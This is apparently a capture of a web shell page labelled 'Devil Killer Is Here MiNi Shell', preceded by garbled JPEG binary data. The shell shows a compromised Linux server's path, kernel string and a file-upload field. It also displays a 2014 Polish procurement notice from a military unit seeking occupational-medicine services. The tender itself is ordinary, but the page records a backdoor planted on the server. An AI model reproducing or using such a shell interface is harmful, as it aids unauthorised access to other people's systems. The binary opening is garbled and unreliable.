JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140110/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140110/11968-N-2014.html

<p class="kh_header"><b>Powidz: Świadczenie usług medycznych w zakresie medycyny pracy dla pracowników wojska i żołnierzy zawodowych dla potrzeb Jednostki Wojskowej 3293 Powidz oraz 3918 Jarocin</b><br>
<b>Numer ogłoszenia: 11968 - 2014; data zamieszczenia: 10.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 3293 , ul. Witkowska 8, 62-430 Powidz, woj. wielkopolskie, tel. 63 277 44 71, faks 63 277 41 00, 2774111.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług medycznych w zakresie medycyny pracy dla pracowników wojska i żołnierzy zawodowych dla potrzeb Jednostki Wojskowej 3293 Powidz oraz 3918 Jarocin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług medycznych dla pracowników  wojska i żołnierzy zawodowych, w zakresie medycyny pracy (badania profilaktyczne wstępne, okresowe i kontrolne - o których mowa w art. 229 § 1, 2 i 5 kodeksu pracy) i profilaktyki, niezbędnych ze względu na warunki pracy, określonych w przepisach prawa pracy i służbie medycyny oraz zgodnie z istotnymi postanowieniami umowy. 
2. Zamawiający dopuszcza możliwość składania ofert częściowych na dowolną liczbę zadań, z uwzględnieniem podziału zakresu zamówienia na 2 zadania:
Zadanie nr 1 - Usługi medyczne dla pracowników wojska i żołnierzy zawodowych w garnizonie Powidz (JW 3293 Powidz).
Zadanie nr 2 - Usługi medyczne dla pracowników wojska i żołnierzy zawodowych w garnizonie Jarocin (JW 3918 Jarocin).
3. Każdemu z wykonawców przysługuje możliwość złożenia oferty na wybrane przez siebie zadanie lub zadania.
4. Szczegółowe zestawienie usług medycznych objętych przedmiotem zamówienia znajduje się w formularzu cenowym -  załączniku nr 2A i  2B do SIWZ.
5. Wymagania stawiane Wykonawcy dotyczące przedmiotu zamówienia:
5.1. Wykonawca musi dysponować gabinetem:
a) w odległości nie większej niż 40 km od granic  administracyjnym miejscowości Powidz dla zadania nr 1, 
b) w odległości nie większej niż 40 km od granic  administracyjnym miejscowości Jarocin dla zadania nr 2. 
(Wyznacznikiem do określenia odległości mogą być np. mapy w oparciu o serwisy stron internetowych www).
5.2. Wykonawca musi mieć uprawnienia podstawowej jednostki medycyny pracy, określone w art. 2 ust. 2 ustawy z dnia 27 czerwca  1997 roku o służbie medycyny pracy (tekst jednolity Dz. U. z 2004r.  Nr 125, poz. 1317 z późniejszymi zmianami).
5.3. Usługi zdrowotne muszą być wykonywane przez personel lekarski, pielęgniarski i inny posiadający odpowiednie kwalifikacje i uprawnienia określone rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. Nr 69, poz. 332 z późniejszymi zmianami).
5.4. Wykonawca zobowiązuje się udzielić świadczeń zdrowotnych zgodnie z przepisami ustawy z dnia 5.12.1996 r. o zawodzie lekarza i lekarza dentysty (tj. z dnia 27 września 2011 roku Dz. U. nr 277 poz. 1634 z późniejszymi zmianami) oraz ustawy z dnia 5 lipca 1196 r. o zawodzie pielęgniarki i położnej (tj. z dnia 25 sierpnia 2009 roku Dz. U. nr 151 poz. 1217 z późniejszymi zmianami) z należyta starannością i ze wskazaniem aktualnej wiedzy medycznej, dostępnymi mu metodami i środkami zapobiegania, rozpoznania oraz zasadami etyki zawodowej, respektując prawa pacjenta - badanego.
5.5. Gabinety, w których będą wykonywane usługi medyczne musza spełniać standardy określone w rozporządzeniu Ministra Zdrowia z dnia 26 czerwca 2012 r. w sprawie wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. z 2012  poz. 739).
5.6. Realizacja świadczeń odbywać się będzie wyłącznie na podstawie imiennych skierowań wraz z: numerem PESEL pracownika/żołnierza zawodowego; rodzajem badania profilaktycznego, jakie ma być wykonane; stanowiskiem pracy; czynnikami szkodliwymi lub uciążliwymi występującymi na stanowisku pracy.
5.7. Skierowania, o którym mowa w pkt. 5.5 ważne są przez okres 30 dni.
5.8. Do skierowania, o którym mowa w pkt 5.5 dołączony będzie wykaz szczegółowych badań, w którym Wykonawca określi: datę stawienia się pracownika - żołnierza na badania, planowany termin i godzinę przeprowadzenia określonych badań. Formularz - wykaz badań jest załącznikiem do umowy i stanowi jej integralna część.
5.9. Wykonawca zobowiązuje się do prowadzenia dokumentacji realizowanych usług medycznych i przekazywania zamawiającemu wykazu zawierającego imię i nazwisko wraz z numerem PESEL oraz rodzajem przeprowadzonego badania. 
5.10.	Zamawiający powierza wykonawcy, na podstawie art. 31 ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (tj. z dnia 17 czerwca 2002 roku Dz. U. r. nr 101 poz. 926 z późniejszymi zmianami), dane osób, których przetwarzanie jest możliwe wyłącznie w celu wywiązywania się wykonawcy z obowiązków związanych z udzielanymi świadczeniami.
5.11.	Faktury będą wystawiane po każdym miesiącu świadczenia usługi będącej przedmiotem umowy.
5.12. Do faktury dołączony będzie wykaz zawierający: imię i nazwisko z numerem PESEL badanego oraz rodzajem przeprowadzonego badania.
5.13.	Badania będą wykonywane w dniach od poniedziałku do piątku w godz. 08:00 do 15:00.
5.14.	Wykonawca poda do wiadomości osób zainteresowanych, na tablicy ogłoszeń przed siedzibą oraz przekaże na piśmie Zamawiającemu informację o zasadach i terminach przyjęć pacjentów na badania profilaktyczne.
5.15.	W przypadku nieobecności lekarza wykonującego konsultacje specjalistyczne Wykonawca w terminie 3 dni roboczych zobowiązany jest do wyznaczenia zastępstwa (innego lekarza) w swojej placówce, które umożliwi wykonanie świadczenia lub wskaże  Zamawiającemu podwykonawcę, który wykona świadczenie.
5.16.	Termin realizacji badań podstawowych nie może przekroczyć 5 dni roboczych od momentu zgłoszenia badanego do zakładu świadczenia usług medycznych.
5.17.	Termin realizacji badań specjalistycznych (badania kierowców, badania psychologiczne) nie może przekroczyć 10 dni roboczych od momentu zgłoszenia badanego do zakładu świadczenia usług medycznych.
5.18.	Wykonawca zobowiązuje się do zapewnienia wykonywania badań na najwyższym poziomie zarówno pod względem obsługi ze strony personelu medycznego, jak i warunków lokalowych oraz świadczenia usług medycznych nieprzerwanie przez cały okres trwania umowy, tzn. bez przerw urlopowych, chorobowych, itp.
5.19.	Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
5.20.	Wykonawca akceptuje fakt, iż badania lekarskie podane w formularzu cenowym (załącznik nr 2A i 2B do SIWZ), służą do skalkulowania ceny, porównania oferty i wyboru oferty najkorzystniejszej.
5.21.	Ceny jednostkowe za poszczególne badania, podane przez Wykonawcę w formularzu cenowym - załącznik nr 2A i 2B do SIWZ, nie mogą ulec zmianie przez cały okres obowiązywania umowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego zgodnie z art. 67 ust.1 pkt 6 ustawy Pzp (Dz. U. z 2013 roku poz. 907 z  późn. zm.)  
Zamówienia te będą polegały na powtórzeniu tego samego rodzaju pracy jak te, które stanowią przedmiot niniejszego postępowania określonego w SIWZ. Udzielenie zamówienia uzupełniającego wymagać będzie zawarcia odrębnej umowy.
2. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w zakresie usług medycznych dla pracowników  wojska i żołnierzy zawodowych, w zakresie medycyny pracy (badania profilaktyczne wstępne, okresowe i kontrolne - o których mowa w art. 229 § 1, 2 i 5 kodeksu pracy) i profilaktyki, niezbędnych ze względu na warunki pracy, określonych w przepisach prawa pracy i służbie medycyny oraz zgodnie z istotnymi postanowieniami umowy.
Szczegółowe zestawienie usług medycznych objętych przedmiotem zamówienia znajduje się w formularzu cenowym -  załączniku nr 2A i  2B do SIWZ.
3. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających dla zadania nr 1 - usługi medyczne dla pracowników  wojska i żołnierzy zawodowych w garnizonie Powidz (JW 3293 Powidz) oraz dla zadania nr 2 - usługi medyczne dla pracowników  wojska i żołnierzy zawodowych w garnizonie Jarocin (JW 3918 Jarocin)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.00.00-6, 85.14.50.00-7, 85.15.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełniają Wykonawcy, którzy:
wykażą się decyzją o wpisie do rejestru zakładów opieki zdrowotnej, prowadzonego przez wojewodę lub ministra właściwego do spraw zdrowia albo odpisem z takiego rejestru, wystawionym nie wcześniej niż 6 miesięcy przed terminem składnia ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie stawia szczegółowego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie stawia szczegółowego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełniają Wykonawcy, którzy:
oświadczą, że osoby, które będą uczestniczyć w wykonywaniu przedmiotu zamówienia, posiadają wymagane uprawnienia, o których mowa w ustawie o służbie medycyny pracy (Dz. U. z 2004 roku Nr 125, poz. 1317 z późniejszymi zmianami) oraz rozporządzeniu Ministra Zdrowia i Opieki Społecznej z 30 maja 1996 roku w sprawie prowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie stawia szczegółowego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu wykazania spełniania warunków udziału w postępowaniu, określonych 
w art. 22 ust. 1 ustawy Pzp należy załączyć:
1.1. Decyzję o wpisie do rejestru zakładów opieki zdrowotnej, prowadzonego przez wojewodę lub ministra właściwego do spraw zdrowia albo odpisem z takiego rejestru, wystawionym nie wcześniej niż 6 miesięcy przed terminem składnia ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.33blot.sp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 3293 Powidz, ul. Witkowska nr 8, 62-430 Powidz, pokój nr 230.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2014 godzina 09:30, miejsce: Jednostka Wojskowa 3293 Powidz, ul. Witkowska nr 8, 62-430 Powidz, Kancelaria Jawna - pokój nr 118.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Usługi medyczne dla pracowników wojska i żołnierzy zawodowych w garnizonie Powidz (JW 3293 Powidz).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług medycznych dla pracowników  wojska i żołnierzy zawodowych, w zakresie medycyny pracy (badania profilaktyczne wstępne, okresowe i kontrolne - o których mowa w art. 229 § 1, 2 i 5 kodeksu pracy) i profilaktyki, niezbędnych ze względu na warunki pracy, określonych w przepisach prawa pracy i służbie medycyny oraz zgodnie z istotnymi postanowieniami umowy. 
3.Szczegółowe zestawienie usług medycznych objętych przedmiotem zamówienia znajduje się w formularzu cenowym -  załączniku nr 2A i  2B do SIWZ.
3.Wymagania stawiane Wykonawcy dotyczące przedmiotu zamówienia:
3.1.	Wykonawca musi dysponować gabinetem:
a)	w odległości nie większej niż 40 km od granic  administracyjnym miejscowości Powidz dla zadania nr 1, 
(Wyznacznikiem do określenia odległości mogą być np. mapy w oparciu o serwisy stron internetowych www).
3.2.	Wykonawca musi mieć uprawnienia podstawowej jednostki medycyny pracy, określone w art. 2 ust. 2 ustawy z dnia 27 czerwca  1997 roku o służbie medycyny pracy (tekst jednolity Dz. U. z 2004r.  Nr 125, poz. 1317 z późniejszymi zmianami).
3.3.	Usługi zdrowotne muszą być wykonywane przez personel lekarski, pielęgniarski i inny posiadający odpowiednie kwalifikacje i uprawnienia określone rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. Nr 69, poz. 332 z późniejszymi zmianami).
3.4.	Wykonawca zobowiązuje się udzielić świadczeń zdrowotnych zgodnie z przepisami ustawy z dnia 5.12.1996 r. o zawodzie lekarza i lekarza dentysty (tj. z dnia 27 września 2011 roku Dz. U. nr 277 poz. 1634 z późniejszymi zmianami) oraz ustawy z dnia 5 lipca 1196 r. o zawodzie pielęgniarki i położnej (tj. z dnia 25 sierpnia 2009 roku Dz. U. nr 151 poz. 1217 z późniejszymi zmianami) z należyta starannością i ze wskazaniem aktualnej wiedzy medycznej, dostępnymi mu metodami i środkami zapobiegania, rozpoznania oraz zasadami etyki zawodowej, respektując prawa pacjenta - badanego.
3.5.	Gabinety, w których będą wykonywane usługi medyczne musza spełniać standardy określone w rozporządzeniu Ministra Zdrowia z dnia 26 czerwca 2012 r. w sprawie wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. z 2012  poz. 739).
3.6.	Realizacja świadczeń odbywać się będzie wyłącznie na podstawie imiennych skierowań wraz z: numerem PESEL pracownika/żołnierza zawodowego; rodzajem badania profilaktycznego, jakie ma być wykonane; stanowiskiem pracy; czynnikami szkodliwymi lub uciążliwymi występującymi na stanowisku pracy.
3.7.	Skierowania, o którym mowa w pkt. 5.5 ważne są przez okres 30 dni.
3.8.	Do skierowania, o którym mowa w pkt 5.5 dołączony będzie wykaz szczegółowych badań, w którym Wykonawca określi: datę stawienia się pracownika - żołnierza na badania, planowany termin i godzinę przeprowadzenia określonych badań. Formularz - wykaz badań jest załącznikiem do umowy i stanowi jej integralna część.
3.9.	Wykonawca zobowiązuje się do prowadzenia dokumentacji realizowanych usług medycznych i przekazywania zamawiającemu wykazu zawierającego imię i nazwisko wraz z numerem PESEL oraz rodzajem przeprowadzonego badania. 
3.10.	Zamawiający powierza wykonawcy, na podstawie art. 31 ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (tj. z dnia 17 czerwca 2002 roku Dz. U. r. nr 101 poz. 926 z późniejszymi zmianami), dane osób, których przetwarzanie jest możliwe wyłącznie w celu wywiązywania się wykonawcy z obowiązków związanych z udzielanymi świadczeniami.
3.11.	Faktury będą wystawiane po każdym miesiącu świadczenia usługi będącej przedmiotem umowy.
3.12.	Do faktury dołączony będzie wykaz zawierający: imię i nazwisko z numerem PESEL badanego oraz rodzajem przeprowadzonego badania.
5.13.	Badania będą wykonywane w dniach od poniedziałku do piątku w godz. 08:00 do 15:00.
3.14.	Wykonawca poda do wiadomości osób zainteresowanych, na tablicy ogłoszeń przed siedzibą oraz przekaże na piśmie Zamawiającemu informację o zasadach i terminach przyjęć pacjentów na badania profilaktyczne.
3.15.	W przypadku nieobecności lekarza wykonującego konsultacje specjalistyczne Wykonawca w terminie 3 dni roboczych zobowiązany jest do wyznaczenia zastępstwa (innego lekarza) w swojej placówce, które umożliwi wykonanie świadczenia lub wskaże  Zamawiającemu podwykonawcę, który wykona świadczenie.
3.16.	Termin realizacji badań podstawowych nie może przekroczyć 5 dni roboczych od momentu zgłoszenia badanego do zakładu świadczenia usług medycznych.
3.17.	Termin realizacji badań specjalistycznych (badania kierowców, badania psychologiczne) nie może przekroczyć 10 dni roboczych od momentu zgłoszenia badanego do zakładu świadczenia usług medycznych.
3.18.	Wykonawca zobowiązuje się do zapewnienia wykonywania badań na najwyższym poziomie zarówno pod względem obsługi ze strony personelu medycznego, jak i warunków lokalowych oraz świadczenia usług medycznych nieprzerwanie przez cały okres trwania umowy, tzn. bez przerw urlopowych, chorobowych, itp.
3.19.	Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
3.20.	Wykonawca akceptuje fakt, iż badania lekarskie podane w formularzu cenowym (załącznik nr 2A i 2B do SIWZ), służą do skalkulowania ceny, porównania oferty i wyboru oferty najkorzystniejszej.
3.21.	Ceny jednostkowe za poszczególne badania, podane przez Wykonawcę w formularzu cenowym - załącznik nr 2A i 2B do SIWZ, nie mogą ulec zmianie przez cały okres obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.00.00-6, 85.14.50.00-7, 85.15.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Usługi medyczne dla pracowników wojska i żołnierzy zawodowych w garnizonie Jarocin (JW 3918 Jarocin)..</p>
